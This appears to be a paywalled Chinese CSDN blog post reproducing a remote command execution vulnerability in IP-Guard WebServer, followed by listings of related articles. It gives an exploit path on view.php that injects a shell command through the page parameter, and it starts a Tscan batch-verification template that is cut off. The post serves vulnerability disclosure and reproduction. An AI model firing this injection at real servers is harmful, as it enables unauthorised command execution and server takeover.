IP-Guard Webserver 远程命令执行漏洞(含批量验证poc)

已于 2024-04-04 20:46:34 修改
阅读量71 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-04 20:46:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137382078
版权
本文介绍了IP-Guard Webserver的远程命令执行漏洞,详细阐述了漏洞描述、复现过程及POC使用,提供Tscan工具进行批量验证,并给出了修复建议。
摘要由CSDN通过智能技术生成

0x01漏洞描述

IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理

0x02漏洞复现

(1)payload利用地址:

/ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=%7C%7Cecho+12345+%3Ett.txt

(2)文件上传POC:

0x03POC使用(Tscan验证)

params: []
name: IP-Guard Webserver 远程命令执行漏洞
set:
a4: randomLowercase(8)
a5: randomLowercase(7)
a6: '"SAMEORIGIN"'
rules:

method: GET
path: /ipg/static/ap
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
专栏目录
订阅专栏
漏洞复现】IP-guard WebServer 远程命令执行
失心少年
11-17 874
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!IP-guard是一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。攻击者可利用该漏洞执行任意命令,获取服务器控制权限。1.利用如下POC进行Dnslog测试。
IP_Guard_全面破解方法
10-12
IP_Guard_全面破解方法。IP_Guard_全面破解方法。IP_Guard_全面破解方法
IP-guard WebServer 远程命令执行漏洞复现(0day)】
一纸荒芜的博客
11-10 3618
IP-guard Webserver远程命令执行漏洞(RCE)漏洞复现
【转载】IP-guard 1day漏洞复现
最新发布
07-09 70
IP-guard研发厂商溢信科技,创立于2001年,是国内比较早从事内网安全产品开发的企业,始终致力于对企业内网安全问题的研究和解决。十九年服务于内网安全领域,积累了丰富的经验,为数万家企业量身打造了内网安全解决方案。原文链接:https://blog.csdn.net/weixin_47124866/article/details/134564780。版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。访问test1.php页面,可以见写入命令
IP-guard WebServer 远程命令执行漏洞
weixin_44304678的博客
11-09 1532
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。
自学黑客(网络安全),一般人我劝你还是算了吧
顶峰
09-22 218
网络安全自学路线
IP-guard 远程命令执行漏洞
m0_62172162的博客
12-19 564
IP-guard 远程命令执行漏洞
IP-guard WebServer 任意文件读取漏洞复现
0xSec
04-04 846
由于IP-guard WebServer/ipg/static/appr/lib/flexpaper/php/view.php接口处未对用户输入的数据进行严格的校验和过滤。未经身份验证的攻击者可随意操纵doc参数读取系统内部配置文件造成信息泄露,使系统处于极不安全的状态。
IP-guard WebServer 命令执行漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-13 857
IP-guard是一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。在旧版本申请审批的文件预览功能用到了一个开源的插件 flexpaper,使用的这个插件版本存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,获取服务器控制权限。影响版本:IP-guard<4.81.0307.0没有人规定,一朵花一定要成长为向日葵或者玫瑰。
Goby 漏洞发布|IP-guard WebServer view.php 远程命令执行漏洞
m0_46699477的博客
11-10 312
IP-guard 是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。IP-Guard 版本小于4.81.0307.0 存在漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
IP-guard Webserver view 远程命令执行漏洞【2023最新漏洞
holyxp的博客
11-12 2686
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。
关于IP-guard WebServer 远程命令执行漏洞的学习和自动化验证
wecanning的博客
11-10 713
关于IP-guard WebServer 远程命令执行漏洞的学习和自动化验证
IP-guard WebServer 2024年两个漏洞简单分析
A345545108的博客
05-01 2457
这个漏洞看完索然无味,但是手上又刚好有源码,不看他一下又觉得可惜。
漏洞复现--IP-guard flexpaper RCE
qq_53003652的博客
11-13 693
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。该产品存在远程命令执行漏洞。攻击者可利用该漏洞执行任意命令直接获取服务器权限。ping后加上dnslog验证
IP-guard getdatarecord 存在任意文件读取
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
04-21 1065
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。
IP-guard 1day漏洞复现
归零者的博客
11-22 172
IP-guard 1day漏洞复现
Apache Unomi 1.5.2以下版本面临CVE-2020-13942远程代码执行漏洞
"CVE-2020-13942 是一个针对Apache Unomi的严重安全漏洞,涉及远程代码执行(Remote Code Execution, RCE)风险。Apache Unomi 是一款开源的事件管理和分析平台,用于收集、处理和分析应用程序的日志和事件数据。这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值